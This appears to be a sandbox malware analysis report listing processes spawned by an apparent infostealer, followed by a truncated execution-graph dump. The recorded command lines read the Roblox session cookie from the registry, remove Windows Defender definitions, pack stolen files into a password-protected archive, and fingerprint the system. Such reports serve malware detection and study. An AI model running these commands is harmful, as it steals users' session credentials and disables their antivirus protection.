                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                                            Start time:05:22:19
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 76
Start time: 05:22:19
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 77
Start time: 05:22:20
Start date: 17/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 80
Start time: 05:22:25
Start date: 17/11/2024
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase: 0x7ff6d01f0000
File size: 468'120 bytes
MD5 hash: B3676839B2EE96983F9ED735CD044159
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 81
Start time: 05:22:32
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 82
Start time: 05:22:32
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 83
Start time: 05:22:32
Start date: 17/11/2024
Path: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
Imagebase: 0x7ff64fe50000
File size: 630'736 bytes
MD5 hash: 9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 84
Start time: 05:22:33
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 85
Start time: 05:22:33
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 05:22:34
Start date: 17/11/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic os get Caption
Imagebase: 0x7ff71fde0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 87
Start time: 05:22:34
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:96
Start time:05:22:37
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:97
Start time:05:22:37
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:98
Start time:05:22:37
Start date:17/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff71fde0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:99
Start time:05:22:38
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:0x7ff7bb830000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:100
Start time:05:22:38
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:101
Start time:05:22:38
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:8.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:19.9%
Total number of Nodes:2000
Total number of Limit Nodes:36
16345->16346 16347 7ff6b7523313 16346->16347 16348 7ff6b752335e 16347->16348 16357 7ff6b75202d8 EnterCriticalSection 16347->16357 16348->16294 16359 7ff6b751b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16358->16359 16360 7ff6b7522659 16359->16360 18930 7ff6b75216b0 18941 7ff6b75273e4 18930->18941 18942 7ff6b75273f1 18941->18942 18943 7ff6b751a948 __free_lconv_num 11 API calls 18942->18943 18944 7ff6b752740d 18942->18944 18943->18942 18945 7ff6b751a948 __free_lconv_num 11 API calls 18944->18945 18946 7ff6b75216b9 18944->18946 18945->18944 18947 7ff6b75202d8 EnterCriticalSection 18946->18947 20480 7ff6b752adfe 20481 7ff6b752ae17 20480->20481 20482 7ff6b752ae0d 20480->20482 20484 7ff6b7520338 LeaveCriticalSection 20482->20484 20247 7ff6b751f98c 20248 7ff6b751fb7e 20247->20248 20250 7ff6b751f9ce _isindst 20247->20250 20249 7ff6b7514f08 _get_daylight 11 API calls 20248->20249 20267 7ff6b751fb6e 20249->20267 20250->20248 20253 7ff6b751fa4e _isindst 20250->20253 20251 7ff6b750c550 _log10_special 8 API calls 20252 7ff6b751fb99 20251->20252 20268 7ff6b7526194 20253->20268 20258 7ff6b751fbaa 20260 7ff6b751a900 _isindst 17 API calls 20258->20260 20262 7ff6b751fbbe 20260->20262 20265 7ff6b751faab 20265->20267 20293 7ff6b75261d8 20265->20293 20267->20251 20269 7ff6b751fa6c 20268->20269 20270 7ff6b75261a3 20268->20270 20275 7ff6b7525598 20269->20275 20300 7ff6b75202d8 EnterCriticalSection 20270->20300 20276 7ff6b75255a1 20275->20276 20280 7ff6b751fa81 20275->20280 20277 7ff6b7514f08 _get_daylight 11 API calls 20276->20277 20278 7ff6b75255a6 20277->20278 20279 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20278->20279 20279->20280 20280->20258 20281 7ff6b75255c8 20280->20281 20282 7ff6b751fa92 20281->20282 20283 7ff6b75255d1 20281->20283 20282->20258 20287 7ff6b75255f8 20282->20287 20284 7ff6b7514f08 _get_daylight 11 API calls 20283->20284 20285 7ff6b75255d6 20284->20285 20286 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20285->20286 20286->20282 20288 
7ff6b751faa3 20287->20288 20289 7ff6b7525601 20287->20289 20288->20258 20288->20265 20290 7ff6b7514f08 _get_daylight 11 API calls 20289->20290 20291 7ff6b7525606 20290->20291 20292 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20291->20292 20292->20288 20301 7ff6b75202d8 EnterCriticalSection 20293->20301 20494 7ff6b7515410 20495 7ff6b751541b 20494->20495 20503 7ff6b751f2a4 20495->20503 20516 7ff6b75202d8 EnterCriticalSection 20503->20516 18839 7ff6b750bae0 18840 7ff6b750bb0e 18839->18840 18841 7ff6b750baf5 18839->18841 18841->18840 18843 7ff6b751d5fc 12 API calls 18841->18843 18842 7ff6b750bb6e 18843->18842 18844 7ff6b7519961 18845 7ff6b751a3d8 45 API calls 18844->18845 18846 7ff6b7519966 18845->18846 18847 7ff6b75199d7 18846->18847 18848 7ff6b751998d GetModuleHandleW 18846->18848 18856 7ff6b7519864 18847->18856 18848->18847 18854 7ff6b751999a 18848->18854 18854->18847 18870 7ff6b7519a88 GetModuleHandleExW 18854->18870 18876 7ff6b75202d8 EnterCriticalSection 18856->18876 18871 7ff6b7519abc GetProcAddress 18870->18871 18872 7ff6b7519ae5 18870->18872 18875 7ff6b7519ace 18871->18875 18873 7ff6b7519aea FreeLibrary 18872->18873 18874 7ff6b7519af1 18872->18874 18873->18874 18874->18847 18875->18872 20517 7ff6b752abe3 20518 7ff6b752abf3 20517->20518 20521 7ff6b7515478 LeaveCriticalSection 20518->20521 20332 7ff6b752ad69 20335 7ff6b7515478 LeaveCriticalSection 20332->20335 16361 7ff6b750cc3c 16382 7ff6b750ce0c 16361->16382 16364 7ff6b750cd88 16536 7ff6b750d12c IsProcessorFeaturePresent 16364->16536 16365 7ff6b750cc58 __scrt_acquire_startup_lock 16367 7ff6b750cd92 16365->16367 16373 7ff6b750cc76 __scrt_release_startup_lock 16365->16373 16368 7ff6b750d12c 7 API calls 16367->16368 16370 7ff6b750cd9d __FrameHandler3::FrameUnwindToEmptyState 16368->16370 16369 7ff6b750cc9b 16371 7ff6b750cd21 16388 7ff6b750d274 16371->16388 16373->16369 16373->16371 16525 7ff6b7519b2c 16373->16525 16375 7ff6b750cd26 16391 7ff6b7501000 16375->16391 16379 7ff6b750cd49 16379->16370 16532 
7ff6b750cf90 16379->16532 16383 7ff6b750ce14 16382->16383 16384 7ff6b750ce20 __scrt_dllmain_crt_thread_attach 16383->16384 16385 7ff6b750cc50 16384->16385 16386 7ff6b750ce2d 16384->16386 16385->16364 16385->16365 16386->16385 16543 7ff6b750d888 16386->16543 16389 7ff6b752a4d0 __scrt_get_show_window_mode 16388->16389 16390 7ff6b750d28b GetStartupInfoW 16389->16390 16390->16375 16392 7ff6b7501009 16391->16392 16570 7ff6b7515484 16392->16570 16394 7ff6b75037fb 16577 7ff6b75036b0 16394->16577 16399 7ff6b750c550 _log10_special 8 API calls 16402 7ff6b7503ca7 16399->16402 16400 7ff6b750383c 16737 7ff6b7501c80 16400->16737 16401 7ff6b750391b 16746 7ff6b75045c0 16401->16746 16530 7ff6b750d2b8 GetModuleHandleW 16402->16530 16405 7ff6b750385b 16649 7ff6b7508830 16405->16649 16408 7ff6b750396a 16769 7ff6b7502710 16408->16769 16410 7ff6b750388e 16418 7ff6b75038bb __std_exception_destroy 16410->16418 16741 7ff6b75089a0 16410->16741 16412 7ff6b750395d 16413 7ff6b7503984 16412->16413 16414 7ff6b7503962 16412->16414 16416 7ff6b7501c80 49 API calls 16413->16416 16765 7ff6b751004c 16414->16765 16419 7ff6b75039a3 16416->16419 16420 7ff6b7508830 14 API calls 16418->16420 16427 7ff6b75038de __std_exception_destroy 16418->16427 16424 7ff6b7501950 115 API calls 16419->16424 16420->16427 16422 7ff6b7503a0b 16423 7ff6b75089a0 40 API calls 16422->16423 16425 7ff6b7503a17 16423->16425 16426 7ff6b75039ce 16424->16426 16428 7ff6b75089a0 40 API calls 16425->16428 16426->16405 16429 7ff6b75039de 16426->16429 16433 7ff6b750390e __std_exception_destroy 16427->16433 16780 7ff6b7508940 16427->16780 16430 7ff6b7503a23 16428->16430 16431 7ff6b7502710 54 API calls 16429->16431 16432 7ff6b75089a0 40 API calls 16430->16432 16524 7ff6b7503808 __std_exception_destroy 16431->16524 16432->16433 16434 7ff6b7508830 14 API calls 16433->16434 16435 7ff6b7503a3b 16434->16435 16436 7ff6b7503b2f 16435->16436 16437 7ff6b7503a60 __std_exception_destroy 16435->16437 16438 7ff6b7502710 54 API calls 16436->16438 16439 
7ff6b7508940 40 API calls 16437->16439 16450 7ff6b7503aab 16437->16450 16438->16524 16439->16450 16440 7ff6b7508830 14 API calls 16441 7ff6b7503bf4 __std_exception_destroy 16440->16441 16442 7ff6b7503d41 16441->16442 16443 7ff6b7503c46 16441->16443 16787 7ff6b75044e0 16442->16787 16444 7ff6b7503cd4 16443->16444 16445 7ff6b7503c50 16443->16445 16448 7ff6b7508830 14 API calls 16444->16448 16662 7ff6b75090e0 16445->16662 16452 7ff6b7503ce0 16448->16452 16449 7ff6b7503d4f 16453 7ff6b7503d65 16449->16453 16454 7ff6b7503d71 16449->16454 16450->16440 16455 7ff6b7503c61 16452->16455 16458 7ff6b7503ced 16452->16458 16790 7ff6b7504630 16453->16790 16457 7ff6b7501c80 49 API calls 16454->16457 16460 7ff6b7502710 54 API calls 16455->16460 16468 7ff6b7503cc8 __std_exception_destroy 16457->16468 16461 7ff6b7501c80 49 API calls 16458->16461 16460->16524 16464 7ff6b7503d0b 16461->16464 16462 7ff6b7503dc4 16712 7ff6b7509390 16462->16712 16467 7ff6b7503d12 16464->16467 16464->16468 16466 7ff6b7503dd7 SetDllDirectoryW 16472 7ff6b7503e0a 16466->16472 16514 7ff6b7503e5a 16466->16514 16471 7ff6b7502710 54 API calls 16467->16471 16468->16462 16469 7ff6b7503da7 SetDllDirectoryW LoadLibraryExW 16468->16469 16469->16462 16471->16524 16473 7ff6b7508830 14 API calls 16472->16473 16481 7ff6b7503e16 __std_exception_destroy 16473->16481 16474 7ff6b7504008 16476 7ff6b7504035 16474->16476 16477 7ff6b7504012 PostMessageW GetMessageW 16474->16477 16475 7ff6b7503f1b 16717 7ff6b75033c0 16475->16717 16867 7ff6b7503360 16476->16867 16477->16476 16484 7ff6b7503ef2 16481->16484 16488 7ff6b7503e4e 16481->16488 16487 7ff6b7508940 40 API calls 16484->16487 16487->16514 16488->16514 16793 7ff6b7506dc0 16488->16793 16514->16474 16514->16475 16524->16399 16526 7ff6b7519b43 16525->16526 16527 7ff6b7519b64 16525->16527 16526->16371 18834 7ff6b751a3d8 16527->18834 16531 7ff6b750d2c9 16530->16531 16531->16379 16534 7ff6b750cfa1 16532->16534 16533 7ff6b750cd60 16533->16369 16534->16533 16535 7ff6b750d888 7 API calls 
16534->16535 16535->16533 16537 7ff6b750d152 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode 16536->16537 16538 7ff6b750d171 RtlCaptureContext RtlLookupFunctionEntry 16537->16538 16539 7ff6b750d1d6 __scrt_get_show_window_mode 16538->16539 16540 7ff6b750d19a RtlVirtualUnwind 16538->16540 16541 7ff6b750d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16539->16541 16540->16539 16542 7ff6b750d256 __FrameHandler3::FrameUnwindToEmptyState 16541->16542 16542->16367 16544 7ff6b750d89a 16543->16544 16545 7ff6b750d890 16543->16545 16544->16385 16549 7ff6b750dc24 16545->16549 16550 7ff6b750d895 16549->16550 16551 7ff6b750dc33 16549->16551 16553 7ff6b750dc90 16550->16553 16557 7ff6b750de60 16551->16557 16554 7ff6b750dcbb 16553->16554 16555 7ff6b750dc9e DeleteCriticalSection 16554->16555 16556 7ff6b750dcbf 16554->16556 16555->16554 16556->16544 16561 7ff6b750dcc8 16557->16561 16562 7ff6b750ddb2 TlsFree 16561->16562 16564 7ff6b750dd0c __vcrt_InitializeCriticalSectionEx 16561->16564 16563 7ff6b750dd3a LoadLibraryExW 16566 7ff6b750ddd9 16563->16566 16567 7ff6b750dd5b GetLastError 16563->16567 16564->16562 16564->16563 16565 7ff6b750ddf9 GetProcAddress 16564->16565 16569 7ff6b750dd7d LoadLibraryExW 16564->16569 16565->16562 16566->16565 16568 7ff6b750ddf0 FreeLibrary 16566->16568 16567->16564 16568->16565 16569->16564 16569->16566 16573 7ff6b751f480 16570->16573 16571 7ff6b751f4d3 16572 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16571->16572 16576 7ff6b751f4fc 16572->16576 16573->16571 16574 7ff6b751f526 16573->16574 16880 7ff6b751f358 16574->16880 16576->16394 16888 7ff6b750c850 16577->16888 16580 7ff6b7503710 16890 7ff6b7509280 FindFirstFileExW 16580->16890 16581 7ff6b75036eb GetLastError 16895 7ff6b7502c50 16581->16895 16584 7ff6b7503706 16589 7ff6b750c550 _log10_special 8 API calls 16584->16589 16586 7ff6b7503723 16910 7ff6b7509300 CreateFileW 16586->16910 16587 7ff6b750377d 16921 7ff6b7509440 16587->16921 16592 
